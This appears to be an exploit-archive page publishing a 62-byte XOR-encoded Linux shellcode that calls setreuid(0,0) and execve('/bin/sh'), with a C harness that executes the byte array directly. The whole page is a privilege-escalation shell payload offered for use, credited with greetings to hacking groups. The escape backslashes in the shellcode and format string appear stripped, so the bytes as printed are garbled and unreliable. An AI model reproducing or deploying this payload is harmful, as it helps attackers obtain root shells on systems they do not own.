[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : 62 bytes setreuid(0,0) execve("/bin/sh",NULL,NULL) XOR Encoded Linux Shellcode
# Published : 2010-07-05
# Author :
# Previous Title : Linux/ARM - setuid(0) & execve("/bin/sh","/bin/sh",0) - 38 bytes
# Next Title : Linux/ARM - execve("/bin/sh","/bin/sh",0) - 30 bytes


/*
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web    : http://devilzc0de.org
blog   : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com)
greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !!
*/

#include <stdio.h>

char shellcode[] = "xebx11x5ex31xc9xb1x26x80x74x0exffx01"
		   "x80xe9x01x75xf6xebx05xe8xeaxffxffxff"
		   "x30xc1x30xdax30xc8x30xd3xb1x47x30xda"
		   "x30xc8xccx81xb1x0ax52x69x2ex2ex72x69"
		   "x69x2ex63x68x6fx88xe2x30xc8x30xc8x52"
		   "xccx81";
		
int main(void)
{
	fprintf(stdout,"Length: %dn",strlen(shellcode));
	(*(void(*)()) shellcode)();
}